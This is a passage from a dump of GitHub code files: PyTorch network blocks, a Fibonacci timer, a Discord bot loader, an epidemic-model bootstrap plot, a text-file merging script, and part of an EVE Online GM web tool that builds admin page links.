stride, padding = padding, groups = expanded_channels, bias = False)\n        self.bn2 = nn.BatchNorm2d(expanded_channels, eps = 1e-05, momentum = 0.01)\n        self.relu2 = nn.ReLU()\n        if self.attention == \"SE\":\n            self.se = SE(expanded_channels, reduction_ratio = 4)\n        self.conv3 = nn.Conv2d(expanded_channels, out_channels, kernel_size = 1, stride = 1, bias = False)\n        self.bn3 = nn.BatchNorm2d(out_channels, eps = 1e-05, momentum = 0.01)\n\n    def forward(self, x):\n        # self.residual is either False or a 1x1 Conv2d after __init__, so an\n        # \"== True\" comparison would never match the module; test against False instead.\n        if self.residual is not False:\n            residual = self.residual(x)\n        out = self.conv1(x)\n        out = self.bn1(out)\n        out = self.relu1(out)\n        out = self.conv2(out)\n        out = self.bn2(out)\n        out = self.relu2(out)\n        if self.attention == \"SE\":\n            out = self.se(out)\n        out = self.conv3(out)\n        out = self.bn3(out)\n        if self.residual is not False:\n            out += residual\n        return out\n\nclass ResBlock(nn.Module):\n    def __init__(self, in_channels, out_channels, stride):\n        super().__init__()\n        self.stride = stride\n        if self.stride != 1:\n            self.residual = nn.Conv2d(in_channels, out_channels, kernel_size = 1, stride = stride, bias = False)\n        self.conv1 = nn.Conv2d(in_channels, out_channels, kernel_size = 3, stride = stride, padding = 1, bias = False)\n        self.bn1 = nn.BatchNorm2d(out_channels)\n        self.relu1 = nn.ReLU()\n        self.conv2 = nn.Conv2d(out_channels, out_channels, kernel_size = 3, stride = 1, padding = 1, bias = False)\n        self.bn2 = nn.BatchNorm2d(out_channels)\n        self.relu2 = nn.ReLU()\n\n    def forward(self, x):\n        residual = x\n        if self.stride != 1:\n            residual = self.residual(x)\n        out = self.conv1(x)\n        out = self.bn1(out)\n        out = self.relu1(out)\n        out = self.conv2(out)\n        out = self.bn2(out)\n        out = self.relu2(out)\n        out += residual\n        return out\n\nclass Bottleneck_Block(nn.Module):\n    def __init__(self, in_channels, bottleneck_channels, out_channels, stride):\n        super().__init__()\n        self.in_channels = in_channels\n        self.out_channels = out_channels\n        if self.in_channels != self.out_channels:\n            self.residual = nn.Conv2d(in_channels, out_channels, kernel_size = 1, stride = stride, bias = False)\n        self.conv1 = nn.Conv2d(in_channels, bottleneck_channels, kernel_size = 1, stride = 1, bias = False)\n        self.bn1 = nn.BatchNorm2d(bottleneck_channels)\n        self.relu1 = nn.ReLU()\n        self.conv2 = nn.Conv2d(bottleneck_channels, bottleneck_channels, kernel_size = 3, stride = stride, padding = 1, bias = False)\n        self.bn2 = nn.BatchNorm2d(bottleneck_channels)\n        self.relu2 = nn.ReLU()\n        self.conv3 = nn.Conv2d(bottleneck_channels, out_channels, kernel_size = 1, stride = 1, bias = False)\n        self.bn3 = nn.BatchNorm2d(out_channels)\n        self.relu3 = nn.ReLU()\n\n    def forward(self, x):\n        residual = x\n        if self.in_channels != self.out_channels:\n            residual = self.residual(x)\n        out = self.conv1(x)\n        out = self.bn1(out)\n        out = self.relu1(out)\n        out = self.conv2(out)\n        out = self.bn2(out)\n        out = self.relu2(out)\n        out = self.conv3(out)\n        out = self.bn3(out)\n        out = self.relu3(out)\n        out += residual\n        return out\n\nclass Depthwise_Separable_Conv(nn.Module):\n    def __init__(self, in_channels, out_channels, stride):\n        super().__init__()\n        self.conv1 = nn.Conv2d(in_channels, in_channels, kernel_size = 3, stride = stride, padding = 1, groups = in_channels, bias = False)\n        self.bn1 = nn.BatchNorm2d(in_channels)\n        self.relu1 = nn.ReLU()\n        self.conv2 = nn.Conv2d(in_channels, out_channels, kernel_size = 1, stride = 1, bias = False)\n        self.bn2 = nn.BatchNorm2d(out_channels)\n        self.relu2 = nn.ReLU()\n\n    def forward(self, x):\n        out = self.conv1(x)\n        out = self.bn1(out)\n        out = self.relu1(out)\n        out = self.conv2(out)\n        out = 
self.bn2(out)\n out = self.relu2(out)\n return out\n\n\n ","repo_name":"satyagraha5/Earth","sub_path":"Civilization/Shrine/block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":11742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30440239654","text":"import time\n\ndef fibonacci1(n: int) -> int:\n if n == 0: return 0\n if n == 1: return 1\n return fibonacci1(n - 1) + fibonacci1(n - 2)\n\ndef get_runtime_of_fibonacci1(n: int) -> float:\n start1 = time.time()\n fibonacci1(n)\n stop1 = time.time()\n return (stop1 - start1) * (10 ** (3))\n\ncount = 0\nfibonacci1_data = []\nwhile count < 100:\n fibonacci1_data.append(get_runtime_of_fibonacci1(count))\n count += 5\n\nprint(fibonacci1_data)\n","repo_name":"juliencol/complexity-simulation","sub_path":"functions/fibonacci1.py","file_name":"fibonacci1.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"20660029118","text":"import discord\nfrom discord.ext import commands\n\nimport os\n\nfrom DATA.Database import Database\n\nasync def get_prefix(bot, message):\n if not message.guild:\n return \"!\"\n\n prefixe = await bot.db.fetchval('prefixes', 'prefix', f'g_id = :g_id', g_id=message.guild.id)\n\n if not prefixe:\n return commands.when_mentioned_or(\"!\")(bot, message)\n\n return commands.when_mentioned_or(prefixe)(bot, message)\n\n\nbot = commands.Bot(command_prefix=get_prefix)\nbot.remove_command('help')\n\nbot.db = Database('DATA/bot.db')\n\nTOKEN = open('DATA/TOKEN.txt', 'r').readline().strip()\n\n@bot.event\nasync def on_ready():\n print('Logged in as')\n print(bot.user.name)\n print('------')\n\n bot.channels_words = await get_channels_words()\n\nasync def get_channels_words():\n words = await bot.db.fetchall('words', ['g_id', 'chn_id', 'word'])\n if words is None:\n return dict()\n\n channels_words = dict()\n for word in words:\n g_id = str(word[0])\n chn_id = str(word[1])\n\n if g_id not in channels_words:\n channels_words[g_id] = dict()\n\n if chn_id not in channels_words[g_id]:\n channels_words[g_id][chn_id] = list()\n\n channels_words[g_id][chn_id].append(word[2])\n\n return channels_words\n\n\n\nfor cog in os.listdir(\"./cogs\"):\n if cog.endswith(\".py\") and not cog.startswith(\"_\"):\n try:\n cog = f\"cogs.{cog.replace('.py', '')}\"\n bot.load_extension(cog)\n except Exception as e:\n print(f\"{cog} can not be loaded:\")\n raise e\n\nbot.run(TOKEN)\n","repo_name":"ahmedGamalhamed/re","sub_path":"Keyword_Bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15953887565","text":"import numpy as np \nimport matplotlib as mpl \nfrom matplotlib import pyplot as plt\nfrom matplotlib import dates as mdates\nimport pandas as pd\nimport seaborn as sns\nimport datetime as dt\nimport pickle \nfrom scipy.integrate import odeint\nimport sys\nimport matplotlib.transforms as mtransforms\nfrom numpy.random import poisson\nimport fitSEIRTC\nimport h5py\nfrom pathlib import Path\nsys.path.append('../')\nimport compartmental\n\ncolorpalette = sns.color_palette('colorblind', n_colors=5)\n\naustria_data = pd.read_csv(\"../austria_data.csv\")\ndata = austria_data.loc[(austria_data['date'] >= '2020-09-01') & \n (austria_data['date'] <= '2020-12-06')]\n\ndays = [dt.datetime.strptime(date, '%Y-%m-%d').date() \n for date in 
data['date'].to_numpy()]\n\ndatafit = austria_data.loc[(austria_data['date'] >= '2020-09-01') & \n (austria_data['date'] < '2020-11-03')]\n\ndaysfit = [dt.datetime.strptime(date, '%Y-%m-%d').date() \n for date in datafit['date'].to_numpy()]\n\nsimulation_days = np.arange(0, len(daysfit))\n\nSEIRTC = pickle.load(open(\"../model_SEIRTC.p\", \"rb\"))\n\ninit_pop_SEIRTC = pickle.load(open(\"../initial_population_SEIRTC.p\", \"rb\"))\nparameters_SEIRTC = pickle.load(open(\"../parameters_SEIRTC.p\", \"rb\"))\n\nSEIRTC.set_parameters(list(parameters_SEIRTC))\n\n_, _, ode_SEIRTC = SEIRTC.generate_ode()\n\ndatapath = Path(\"bootstrap.hdf5\")\ndatafile = h5py.File(datapath, 'r')\nnum_bootstrap = 10 # datafile['meta']['n_bootstrap'][()]\ndatafile.close()\n\nfig, axes = plt.subplots(nrows = 1, ncols = 4, figsize=(12, 3))\nlabels = ['A', 'B', 'C', 'D']\n\nfor label, ax in zip(labels, axes):\n\n trans = mtransforms.ScaledTranslation(-20/72, 7/72, fig.dpi_scale_trans)\n ax.text(0.0, 1.0, label+'.', transform=ax.transAxes + trans,\n fontsize='xx-large', va='bottom')\n\n# original solution\nsolution_SEIRTC = odeint(\n ode_SEIRTC,\n np.array(list(init_pop_SEIRTC.values())),\n simulation_days,\n args = (list(parameters_SEIRTC.values()),)\n )\n\nresults_SEIRTC = fitSEIRTC.results(solution_SEIRTC, SEIRTC)\ncases = results_SEIRTC['cases']\ntests = results_SEIRTC['tests']\n\nnp.random.seed(1)\n\nbootstrap_cases = np.zeros(cases.shape)\nbootstrap_tests = np.zeros(tests.shape)\n\nfor day, n_case in enumerate(cases):\n bootstrap_cases[day] = poisson(n_case)\n\nfor day, n_test in enumerate(tests):\n bootstrap_tests[day] = poisson(n_test)\n\naxes[0].plot(cases, color=colorpalette[0], lw=2.0, label='best-fit SEIRTC')\naxes[0].plot(\n bootstrap_cases, color='black', lw=1.0, label='Poisson bootstrap'\n )\n\naxes[1].plot(tests, color=colorpalette[3], lw=2.0, label='best-fit SEIRTC')\naxes[1].plot(\n bootstrap_tests, color='black', lw=1.0, label='Poisson bootstrap'\n )\n\n# Bootstraps \n\ninit_pop = init_pop_SEIRTC.copy()\npars = parameters_SEIRTC.copy()\n\nfor n in range(1, num_bootstrap + 1):\n datafile = h5py.File(datapath, 'r')\n\n for key in datafile[f'{n}']['init_pop'].keys():\n init_pop[key] = datafile[f'{n}']['init_pop'][key][()]\n\n for key in datafile[f'{n}']['pars'].keys():\n pars[key] = datafile[f'{n}']['pars'][key][()]\n\n datafile.close()\n\n sol = odeint(\n ode_SEIRTC,\n np.array(list(init_pop.values())),\n simulation_days,\n args = (list(pars.values()),)\n )\n\n results = fitSEIRTC.results(sol, SEIRTC)\n cases = results['cases']\n tests = results['tests'] \n axes[2].plot(cases, color=colorpalette[0], alpha=0.2)\n axes[3].plot(tests, color=colorpalette[3], alpha=0.2)\n\n# axes[1].set_yscale('log')\n# axes[1].set_yscale('log')\n\nfor ax in axes:\n ax.set_xlim(0, 20)\n\nfor i in [0, 2]:\n axes[i].set_ylim(350, 800)\n axes[i].set_ylabel(\"Cases\")\n\nfor i in [1, 3]:\n axes[i].set_ylim(9000, 18000)\n axes[i].set_ylabel(\"Tests\")\n\naxes[0].legend()\naxes[1].legend()\n\nplt.tight_layout()\nfig.savefig(\"bootstrap.png\", dpi=150)\n\nplt.show()\n","repo_name":"burakbudanur/autoacc-public","sub_path":"python/bootstrap/plot_bootstrap.py","file_name":"plot_bootstrap.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28406080582","text":"import re\n\nmylines = [] # Declare an empty list named mylines.\nmylines2 = [] # Declare an empty list named mylines2.\n\n\n\n# with open ('Language2.txt', 'rt', 
encoding=\"utf16\") as myfile: # Open lorem.txt for reading\n# for txtline in myfile: # For each line, stored as myline,\n#\n#\n# regex = re.compile('=')\n# if (regex.search(txtline) == None):\n# new_line = txtline\n# mylines.append(new_line)\n# else:\n# old_line = txtline\n# new_line = old_line.split(\"=\", 1)[1]\n# mylines.append(new_line) # add its contents to mylines.\n#\n#\nwith open('Language2.txt', 'rt', encoding=\"utf16\") as myfile2: # Open lorem.txt for reading\n for txtline2 in myfile2: # For each line, stored as myline,\n\n regex = re.compile('=')\n if (regex.search(txtline2) == None):\n new_line2 = txtline2\n mylines2.append(new_line2)\n else:\n old_line2 = txtline2\n new_line2 = old_line2.split('=')[0]+'='\n mylines2.append(new_line2 + '\\n') # add its contents to mylines.\n\n#\n# with open('Language3.txt', 'w', encoding=\"utf16\") as f:\n# for line in mylines:\n# if line == \"\":\n# f.write(\"\\n\")\n# else:\n# f.write(line)\n#\nwith open('Language4.txt', 'w', encoding=\"utf16\") as f:\n for line2 in mylines2:\n if line2 == \"\":\n f.write(\"\\n\")\n else:\n f.write(line2)\n\n\n\ncombine =[]\n\nwith open(\"language3.txt\", encoding=\"utf16\") as language3lines:\n with open('language4.txt', encoding=\"utf16\") as language4lines:\n with open(\"combined.txt\", \"w\", encoding=\"utf16\") as combinedlines:\n #Read first file\n xlines = language3lines.readlines()\n #Read second file\n ylines = language4lines.readlines()\n #Combine content of both lists\n #combine = list(zip(ylines,xlines))\n #Write to third file\n for i in range(len(xlines)):\n line = ylines[i].strip() + xlines[i]\n combinedlines.write(line)","repo_name":"Patryk-Rak/text-replacer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33639311573","text":"#Embedded file name: c:/depot/games/branches/release/EVE-TRANQUILITY/eve/common/script/util/espwriters.py\nimport htmlwriter\nimport util\nimport re\nimport blue\nimport sys\nimport macho\nimport notificationUtil\nimport time\nimport os\nimport localization\ntry:\n import logConst\nexcept:\n logConst = util.KeyVal()\n\nfrom service import ROLEMASK_VIEW, ROLE_ADMIN, ROLE_CONTENT, ROLE_GML, ROLE_GMH, ROLE_PROGRAMMER, ROLE_PETITIONEE\n\nclass ESPHtmlWriter(htmlwriter.SPHtmlWriter):\n __guid__ = 'htmlwriter.ESPHtmlWriter'\n\n def SelectCharacter(self):\n if session.charid is None:\n urlparameters = ''\n for q in self.request.query.iteritems():\n if q[0] is not '':\n urlparameters += '%s=%s&' % q\n\n session.redirecturl = self.request.path + '?' 
+ urlparameters\n self.response.Redirect('/gm/character.py?action=MyCharacters&')\n\n def AppBottomLeft(self):\n s = htmlwriter.SPHtmlWriter.AppBottomLeft(self)\n if macho.mode == 'server':\n if session.charid:\n s += ' - Logoff'\n return s\n\n if macho.mode == 'server':\n\n def GetOperationText(self, operationID, isDescription = False):\n if operationID not in self.cache.Index(const.cacheStaOperations):\n return ''\n if isDescription:\n return localization.GetByMessageID(self.cache.Index(const.cacheStaOperations, operationID).descriptionID)\n return localization.GetByMessageID(self.cache.Index(const.cacheStaOperations, operationID).operationNameID)\n\n def GetRoleDescription(self, roleID, isShort = False):\n if roleID not in self.cache.Index(const.cacheCrpRoles):\n return ''\n if isShort:\n return localization.GetByMessageID(self.cache.Index(const.cacheCrpRoles, roleID).shortDescriptionID)\n return localization.GetByMessageID(self.cache.Index(const.cacheCrpRoles, roleID).descriptionID)\n\n def GetCelestialDescription(self, itemID):\n if itemID in self.cache.Index(const.cacheMapCelestialDescriptions):\n return localization.GetByMessageID(self.cache.Index(const.cacheMapCelestialDescriptions, itemID).descriptionID)\n return ''\n\n def GetCorpActivityName(self, activityID):\n if activityID in self.cache.Index(const.cacheCrpActivities):\n return localization.GetByMessageID(self.cache.Index(const.cacheCrpActivities, activityID).activityNameID)\n return ''\n\n def MetaGroupLink(self, metaGroupID, linkText = None, props = ''):\n if metaGroupID is None:\n return ''\n else:\n if linkText is None:\n linkText = cfg.invmetagroups.Get(metaGroupID).metaGroupName\n if linkText is None:\n return self.FontRed('Unknown')\n return self.Link('/gd/type.py', linkText, {'action': 'MetaGroups'}, props)\n\n def OwnerLink(self, ownerID, ownerTypeID = None, linkText = None, props = ''):\n if ownerID is None:\n return ''\n if ownerTypeID is None:\n try:\n owner = cfg.eveowners.Get(ownerID)\n except:\n sys.exc_clear()\n if linkText is None:\n return self.FontRed('???')\n else:\n return linkText\n\n ownerTypeID = owner.typeID\n if not linkText:\n linkText = owner.ownerName\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n if ownerTypeID == const.typeFaction:\n return self.FactionLink(ownerID, linkText, props)\n elif ownerTypeID == const.typeCorporation:\n return self.CorporationLink(ownerID, linkText, props)\n elif ownerTypeID == const.typeAlliance:\n return self.AllianceLink(ownerID, linkText, props)\n elif ownerTypeID == const.typeSystem:\n return linkText\n else:\n return self.CharacterLink(ownerID, linkText, props)\n\n def IPAddress(self, ipAddress, ipAddressID = None):\n if not ipAddress and ipAddressID is None:\n return ''\n if ipAddressID:\n ipAddressLink = self.Link('/gm/users.py', ipAddress, {'action': 'IPLogs',\n 'IPID': ipAddressID})\n else:\n ipAddressLink = self.Link('/gm/users.py', ipAddress, {'action': 'IPLogs',\n 'IP': ipAddress})\n if ipAddress:\n evelogsUrl = self.cache.Setting('system', 'evelogsUrl')\n if not evelogsUrl:\n return ipAddressLink\n evelogsUrl = 'http://%s/' % evelogsUrl\n flagLink = self.GetSpan(self.Link('%sIPLookup?ip=%s' % (evelogsUrl, ipAddress), self.Image('%sIPLookup?ip=%s&flag=16' % (evelogsUrl, ipAddress))), className='csp-flag')\n return ipAddressLink + ' ' + flagLink\n\n def LocationLink(self, locationID, linkText = None, props = ''):\n if locationID is None:\n return ''\n if linkText is None:\n if locationID < 70000000 or locationID > 80000000:\n try:\n 
location = cfg.evelocations.Get(locationID)\n except:\n sys.exc_clear()\n return self.FontRed('???')\n\n linkText = location.locationName\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n if locationID < const.minRegion:\n return linkText\n elif locationID < const.minConstellation:\n return self.RegionLink(locationID, linkText, props)\n elif locationID < const.minSolarSystem:\n return self.ConstellationLink(locationID, linkText, props)\n elif locationID < const.minUniverseCelestial:\n return self.SystemLink(locationID, linkText, props)\n elif locationID < const.minStation:\n return linkText\n elif locationID < const.minUniverseAsteroid:\n return self.StationLink(locationID, linkText, props)\n else:\n return linkText\n\n def CharacterLink(self, characterID, linkText = None, props = '', noHover = False):\n if util.IsDustCharacter(characterID):\n return htmlwriter.SPHtmlWriter.CharacterLink(self, characterID, linkText, props)\n if characterID is None:\n return ''\n if linkText is None:\n linkText = self.OwnerName(characterID)\n if linkText is None:\n return self.FontRed('Unknown')\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n return self.GetTooltip(href='/gm/character.py?action=Character&characterID=%s' % characterID, ajax='/gm/worker_info.py?action=FetchInfo&id=%s&idType=1' % characterID, title=linkText, caption=linkText)\n\n def CharacterLinkActions(self, characterID, linkText = None, actions = []):\n if characterID is None:\n return ''\n if linkText is None:\n linkText = self.OwnerName(characterID)\n if linkText is None:\n return self.FontRed('Unknown')\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n return self.GetTooltipActions(href='/gm/character.py?action=Character&characterID=%s' % characterID, ajax='/gm/worker_info.py?action=FetchInfo&id=%s&idType=1' % characterID, title=linkText, caption=linkText, actions=actions)\n\n def PetitionLink(self, petID, linkText = None, props = ''):\n if petID is None:\n return ''\n else:\n if linkText is None:\n linkText = 'petition'\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n return self.Link('/gm/petitionClient.py', linkText, {'action': 'ViewPetition',\n 'petitionID': petID}, props)\n\n def CorporationLink(self, corporationID, linkText = None, props = ''):\n if corporationID is None:\n return ''\n if linkText is None:\n linkText = self.OwnerName(corporationID)\n if linkText is None:\n return self.FontRed('Unknown')\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n return self.GetTooltip(href='/gm/corporation.py?action=Corporation&corporationID=%s' % corporationID, ajax='/gm/worker_info.py?action=FetchInfo&id=%s&idType=3' % corporationID, title=linkText, caption=linkText)\n\n def AllianceLink(self, allianceID, linkText = None, props = ''):\n if allianceID is None:\n return ''\n if linkText is None:\n linkText = self.OwnerName(allianceID)\n if linkText is None:\n return self.FontRed('Unknown')\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n return self.GetTooltip(href='/gm/alliance.py?action=Alliance&allianceID=%s' % allianceID, ajax='/gm/worker_info.py?action=FetchInfo&id=%s&idType=9' % allianceID, title=linkText, caption=linkText)\n\n def WarableEntityLink(self, ownerID, linkText = None, props = ''):\n if ownerID is None:\n return ''\n else:\n if linkText is None:\n linkText = self.OwnerName(ownerID)\n if linkText is None:\n return self.FontRed('Unknown')\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n return 
self.Link('/gm/war.py', linkText, {'action': 'WarableEntity',\n                                                  'ownerID': ownerID}, props)\n\n    def FactionLink(self, factionID, linkText = None, props = ''):\n        if factionID is None:\n            return ''\n        if linkText is None:\n            linkText = self.OwnerName(factionID)\n            if linkText is None:\n                return self.FontRed('Unknown')\n        if linkText is not None:\n            linkText = self.HTMLEncode(linkText)\n        return self.GetTooltip(href='/gm/faction.py?action=Faction&factionID=%s' % factionID, ajax='/gm/worker_info.py?action=FetchInfo&id=%s&idType=8' % factionID, title=linkText, caption=linkText)\n\n    def StationLink(self, stationID, linkText = None, props = ''):\n        if stationID is None:\n            return ''\n        if linkText is None:\n            linkText = self.LocationName(stationID)\n            if linkText is None:\n                return self.FontRed('Unknown')\n        if linkText is not None:\n            linkText = self.HTMLEncode(linkText)\n        return self.GetTooltip(href='/gm/stations.py?action=Station&stationID=%s' % stationID, ajax='/gm/worker_info.py?action=FetchInfo&id=%s&idType=7' % stationID, title=linkText, caption=linkText)\n\n    def WorldSpaceLink(self, worldSpaceID, linkText = None, props = ''):\n        if worldSpaceID is None:\n            return ''\n        else:\n            if linkText is None:\n                linkText = self.LocationName(worldSpaceID)\n                if linkText is None:\n                    return self.FontRed('Unknown')\n            if linkText is not None:\n                linkText = self.HTMLEncode(linkText)\n            return self.Link('/gm/worldSpaces.py', linkText, {'action': 'WorldSpace',\n             'worldspaceID': worldSpaceID}, props)\n\n    def SystemLink(self, systemID, linkText = None, props = ''):\n        if systemID is None:\n            return ''\n        if linkText is None:\n            linkText = self.LocationName(systemID)\n            if linkText is None:\n                return self.FontRed('Unknown')\n        if linkText is not None:\n            linkText = self.HTMLEncode(linkText)\n        return self.GetTooltip(href='/gd/universe.py?action=System&systemID=%s' % systemID, ajax='/gm/worker_info.py?action=FetchInfo&id=%s&idType=4' % systemID, title=linkText, caption=linkText)\n\n    def ConstellationLink(self, constellationID, linkText = None, props = ''):\n        if constellationID is None:\n            return ''\n        if linkText is None:\n            linkText = self.LocationName(constellationID)\n            if linkText is None:\n                return self.FontRed('Unknown')\n        if linkText is not None:\n            linkText = self.HTMLEncode(linkText)\n        return self.GetTooltip(href='/gd/universe.py?action=Constellation&constellationID=%s' % constellationID, ajax='/gm/worker_info.py?action=FetchInfo&id=%s&idType=6' % constellationID, title=linkText, caption=linkText)\n\n    def RegionLink(self, regionID, linkText = None, props = ''):\n        if regionID is None:\n            return ''\n        if linkText is None:\n            linkText = self.LocationName(regionID)\n            if linkText is None:\n                return self.FontRed('Unknown')\n        if linkText is not None:\n            linkText = self.HTMLEncode(linkText)\n        return self.GetTooltip(href='/gd/universe.py?action=Region&regionID=%s' % regionID, ajax='/gm/worker_info.py?action=FetchInfo&id=%s&idType=5' % regionID, title=linkText, caption=linkText)\n\n    def PlanetLink(self, planetID, linkText = None, props = ''):\n        if planetID is None:\n            return ''\n        if linkText is None:\n            linkText = self.LocationName(planetID)\n            if linkText is None:\n                return self.FontRed('Unknown')\n        if linkText is not None:\n            linkText = self.HTMLEncode(linkText)\n        return self.GetTooltip(href='/gd/universe.py?action=Planet&planetID=%s' % planetID, ajax='/gm/worker_info.py?action=FetchInfo&id=%s&idType=10' % planetID, title=linkText, caption=linkText)\n\n    def DistrictLink(self, district, text = None, props = ''):\n        if district is None:\n            return ''\n        if 
isinstance(district, (int, long)):\n district = self.session.ServiceProxy('districtManager').GetDistrict(district)\n if text is None:\n text = localization.GetImportantByLabel('UI/Locations/LocationDistrictFormatter', solarSystemID=district['solarSystemID'], romanCelestialIndex=util.IntToRoman(district['celestialIndex']), districtIndex=district['index'])\n if text is None:\n return self.FontRed('Unknown')\n if text is not None:\n text = self.HTMLEncode(text)\n return self.Link('/dust/districts.py', text, {'action': 'District',\n 'districtID': district['districtID']}, props)\n\n def BattleLink(self, battle, text = None, props = ''):\n if battle is None:\n return ''\n if isinstance(battle, (int, long)):\n battle = self.session.ServiceProxy('battleManager').GetBattleInfo(battle)\n if not text:\n if battle['battleName']:\n text = battle['battleName']\n elif battle['conflictID'] and battle['conflictID'] > 0:\n text = 'Corporation Battle - %s' % battle['battleID']\n else:\n text = 'Instant Battle - %s' % battle['battleID']\n return self.Link('/dust/battles.py', text, {'action': 'Battle',\n 'battleID': battle['battleID']}, props)\n\n def MapLink(self, itemID, linkText = 'Map', props = ''):\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n if itemID is None:\n return ''\n else:\n return self.Link('/gd/universe.py', linkText, {'action': 'Map',\n 'itemID': itemID}, props)\n\n def MissionLink(self, contentID, linkText = None, props = ''):\n if contentID in self.cache.Index(const.cacheAgtContentTemplates):\n r = self.cache.Index(const.cacheAgtContentTemplates, contentID)\n if linkText is None:\n t = r.contentTemplate\n t = t[t.find('_') + 1:]\n linkText = localization.GetByMessageID(r.contentNameID)\n return '%s - %s' % (t, self.Link('/gd/agents.py', linkText, {'action': 'CreateOrEditContent',\n 'contentID': contentID,\n 'contentTemplate': r.contentTemplate,\n 'edit': 0}))\n else:\n return self.FontRed('Mission not found')\n\n def RewardLink(self, rewardID, linkText = None, props = ''):\n if linkText is None:\n row = self.DB2.SQLInt('name', 'reward.rewards', '', '', 'rewardID', rewardID)\n if len(row) == 0:\n return 'Deleted reward'\n linkText = row.name\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n return self.Link('/gd/rewards.py', linkText, {'action': 'ViewReward',\n 'rewardID': rewardID}, props)\n\n def PinLink(self, pinID, linkText = None, props = ''):\n pinName = linkText\n if pinName is None:\n pinRow = self.DB2.SQLBigInt('typeID', 'planet.pins', '', '', 'pinID', pinID)\n if len(pinRow) == 0:\n return 'Deleted pin'\n pinName = cfg.invtypes.Get(pinRow[0].typeID).name\n if pinName is not None:\n pinName = self.HTMLEncode(pinName)\n return self.Link('/gm/planets.py', pinName, {'action': 'ViewPin',\n 'pinID': pinID}, props)\n\n def PinTypeLink(self, pinID, linkText = None, props = ''):\n pinRow = self.DB2.SQLBigInt('typeID', 'planet.pins', '', '', 'pinID', pinID)[0]\n pinTypeID = pinRow.typeID\n pinName = linkText\n if pinName is None:\n pinName = cfg.invtypes.Get(pinRow.typeID).name\n if pinName is not None:\n pinName = self.HTMLEncode(pinName)\n return self.TypeLink(pinTypeID, linkText=pinName, props=props)\n\n def SchematicLink(self, schematicID, linkText = None, props = ''):\n schematicName = linkText\n if schematicName is None:\n schematicName = cfg.schematics.Get(schematicID).schematicName\n if schematicName is not None:\n schematicName = self.HTMLEncode(schematicName)\n return self.Link('/gd/schematics.py', schematicName, {'action': 'View',\n 
'schematicID': schematicID})\n\n def RecipeLink(self, parentID, parentType, text = None):\n if text is None:\n text = self.HTMLEncode(text)\n if parentType == const.cef.PARENT_TYPEID:\n text = cfg.invtypes.Get(parentID).typeName\n elif parentType == const.cef.PARENT_GROUPID:\n text = cfg.invgroups.Get(parentID).groupName\n else:\n text = cfg.invcategories.Get(parentID).categoryName\n if text is not None:\n text = self.HTMLEncode(text)\n return self.Link('/gd/entities.py', text, {'action': 'Recipe',\n 'parentID': parentID,\n 'parentType': parentType})\n\n def SystemHeader(self, systemID, smallHeader = 1, menuPlacement = 'rMenu'):\n s = self.cache.Row(const.cacheEspSolarSystems, systemID)\n if s.factionID is None:\n image = '/img/system.jpg'\n else:\n image = '/img/faction%s.jpg' % s.factionID\n lines = []\n lines.append([1, 'Constellation', self.ConstellationLink(s.constellationID)])\n lines.append([1, 'Region', self.RegionLink(s.regionID)])\n if smallHeader == 0 and s.combatZoneID:\n combatZoneName = self.cache.IndexText(const.cacheFacWarCombatZones, s.combatZoneID)\n lines.append([0, 'Combat Zone', self.Link('/gd/combatZones.py', combatZoneName, {'action': 'Zone',\n 'zoneID': s.combatZoneID})])\n if s.factionID:\n lines.append([0, 'Faction', self.FactionLink(s.factionID)])\n lines.append([0, 'Security', s.security])\n self.SubjectHeader(smallHeader, 'SYSTEM', systemID, s.solarSystemName, '#FFFF80', image, '/gd/universe.py', 'System', 'systemID', lines)\n li = []\n li.append('#SYSTEM')\n li.append(self.Link('/gd/universe.py', 'INFO', {'action': 'System',\n 'systemID': systemID}))\n li.append('-')\n li.append(self.Link('/gd/universe.py', 'Population and Park Load', {'action': 'PopulationParkLoad',\n 'systemID': systemID}))\n li.append(self.Link('/gd/universe.py', 'Jumps', {'action': 'Jumps',\n 'systemID': systemID}))\n li.append(self.Link('/gd/universe.py', 'Stations', {'action': 'Stations',\n 'systemID': systemID}))\n li.append(self.Link('/gd/universe.py', 'Sovereignty Structures', {'action': 'SovereigntyStructures',\n 'systemID': systemID}))\n li.append(self.Link('/gd/universe.py', 'Starbases', {'action': 'Starbases',\n 'systemID': systemID}))\n li.append(self.Link('/gd/universe.py', 'Celestials', {'action': 'Celestials',\n 'systemID': systemID}) + self.MidDot() + self.Link('/gd/universe.py', 'Moons', {'action': 'Moons',\n 'systemID': systemID}))\n li.append(self.Link('/gd/universe.py', 'Asteroid Belts', {'action': 'AsteroidBelts',\n 'systemID': systemID}) + self.MidDot() + self.Link('/gd/universe.py', 'Asteroids', {'action': 'Asteroids',\n 'systemID': systemID}))\n li.append(self.Link('/gd/universe.py', 'Constellation Map', {'action': 'Map',\n 'itemID': s.constellationID}))\n li.append(self.Link('/gd/universe.py', 'Development Indices', {'action': 'DevelopmentIndices',\n 'systemID': systemID}))\n li.append(self.Link('/gd/universe.py', 'Cargo Links', {'action': 'SystemCargoLinks',\n 'systemID': systemID}))\n li.append(self.Link('/gm/logs.py', 'Events', {'action': 'ItemEvents',\n 'itemID': systemID}))\n li.append(self.Link('/gd/universe.py', 'Factional Warfare', {'action': 'FactionalWarfare',\n 'systemID': systemID}))\n li.append(self.Link('/gm/inventory.py', 'Find 